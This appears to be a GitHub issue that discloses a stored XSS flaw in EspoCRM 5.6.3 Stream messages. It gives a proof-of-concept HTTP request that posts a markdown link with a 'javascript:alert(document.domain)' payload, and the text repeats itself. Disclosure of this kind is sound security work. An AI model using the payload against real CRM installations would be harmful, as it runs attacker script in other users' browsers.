Current version of EspoCRM 5.6.3 is vulnerable to stored XSS due to lack of filtration of user-supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser.
PoC
Make the following request (insert your authentication data and hostname)
POST /api/v1/Note HTTP/1.1
Host: <PASTE YOUR HOSTNAME HERE>
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Basic <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization: <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 108
Cookie: <PASTE YOUR COOKIE HERE>
{"type":"Post","targetType":"self","post":"[test](javascript:alert(document.domain%29)","attachmentsIds":[]}
Then open the notifications and click the link.
The text was updated successfully, but these errors were encountered:
Description
Current version of EspoCRM 5.6.3 is vulnerable to stored XSS due to lack of filtration of user-supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser.
PoC
Make the following request (insert your authentication data and hostname)
Then open the notifications and click the link.

The text was updated successfully, but these errors were encountered: